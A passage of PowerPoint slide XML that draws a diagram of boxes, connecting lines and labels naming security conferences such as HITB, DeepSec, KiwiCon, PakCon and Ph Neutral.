            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4428" y="3048"/>
                <a:ext cx="149" cy="737"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35936" name="Rectangle 470"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4436" y="3791"/>
                <a:ext cx="347" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Bellua Asia</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35937" name="Rectangle 471"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3700" y="3181"/>
                <a:ext cx="372" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35938" name="Rectangle 472"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3700" y="3181"/>
                <a:ext cx="372" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35939" name="Line 473"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3604" y="2566"/>
                <a:ext cx="282" cy="615"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35940" name="Rectangle 474"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3821" y="3188"/>
                <a:ext cx="176" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>HITB</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35941" name="Rectangle 475"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3454" y="3030"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35942" name="Rectangle 476"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3454" y="3030"/>
                <a:ext cx="242" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35943" name="Line 477"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="3575" y="2557"/>
                <a:ext cx="22" cy="473"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35944" name="Rectangle 478"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3511" y="3034"/>
                <a:ext cx="118" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>SC</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35945" name="Rectangle 479"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3586" y="3034"/>
                <a:ext cx="69" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>&amp;</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35946" name="Rectangle 480"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3623" y="3034"/>
                <a:ext cx="43" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>I</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35947" name="Rectangle 481"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3708" y="2878"/>
                <a:ext cx="340" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35948" name="Rectangle 482"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3708" y="2878"/>
                <a:ext cx="340" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35949" name="Line 483"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3809" y="2483"/>
                <a:ext cx="69" cy="395"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35950" name="Rectangle 484"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3778" y="2884"/>
                <a:ext cx="257" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>PakCon</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35951" name="Rectangle 485"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5223" y="3332"/>
                <a:ext cx="348" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35952" name="Rectangle 486"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5223" y="3332"/>
                <a:ext cx="348" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35953" name="Line 487"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="5397" y="3415"/>
                <a:ext cx="81" cy="270"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35954" name="Rectangle 488"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5291" y="3338"/>
                <a:ext cx="262" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>KiwiCon</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35955" name="Rectangle 489"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1939" y="2274"/>
                <a:ext cx="444" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35956" name="Rectangle 490"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1939" y="2274"/>
                <a:ext cx="444" cy="82"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35957" name="Line 491"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2161" y="2079"/>
                <a:ext cx="810" cy="195"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35958" name="Rectangle 492"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2041" y="2276"/>
                <a:ext cx="294" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>DeepSec</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35959" name="Rectangle 493"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1992" y="2124"/>
                <a:ext cx="440" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35960" name="Rectangle 494"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1992" y="2124"/>
                <a:ext cx="440" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35961" name="Line 495"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2212" y="1972"/>
                <a:ext cx="723" cy="152"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35962" name="Rectangle 496"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2079" y="2127"/>
                <a:ext cx="331" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Ph Neutral</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35963" name="Rectangle 497"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2293" y="3231"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35964" name="Rectangle 498"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2293" y="3231"/>
                <a:ext cx="545" cy="83"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35965" name="Line 499"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1968" y="3276"/>
                <a:ext cx="453" cy="67"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35966" name="Rectangle 500"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2351" y="3236"/>
                <a:ext cx="75" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="700">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>H</a:t>
                </a:r>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35967" name="Rectangle 501"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
